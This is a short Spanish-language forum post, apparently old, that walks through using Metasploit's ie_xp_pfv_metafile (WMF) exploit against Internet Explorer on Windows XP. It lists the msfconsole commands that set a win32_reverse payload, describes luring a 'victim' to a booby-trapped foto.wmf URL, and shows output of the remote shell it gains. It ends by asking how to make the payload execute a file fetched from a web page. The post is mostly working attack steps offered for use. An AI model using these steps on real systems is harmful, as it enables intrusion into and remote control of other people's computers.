hola a todos ya me va eso
para empezar hay que bajar el metasploit yo por jemeplo he bajado la version 2.4
despues hay que user msfupdate dos veces porque dos veces?la primera vez para hacer update al mimso fihcer msfupdate y la seconda vez para hacer update de los exploit inclyuendo nuetrso expeloit ese
liego it al fihcier msfconsole
msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST mi ip
LHOST -> mi ip
msf ie_xp_pfv_metafile(win32_reverse) >exploit
aqui hay que esperar que alguna vistima se consteta a tu pc con el puersto 8080 para que se infecte y te devuele el shell
poe ejmple os abries el ixplorer y poneis
http://tuip:8080/foto.wmf ya verais que os saldra el shell
- HTTP Client connected from 192.168.0.219:1060 using Windows XP
- Got connection from 200.168.0.2:4321 <-> 200.168.0.219:1061
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\XXXX\Desktop>
ahora me pregunta aqui si algain conoce eso de metasploit que cambie le payload de win32_reverse para un win32_exec para que ejecuta un fichero diretament de una pagina web
saludos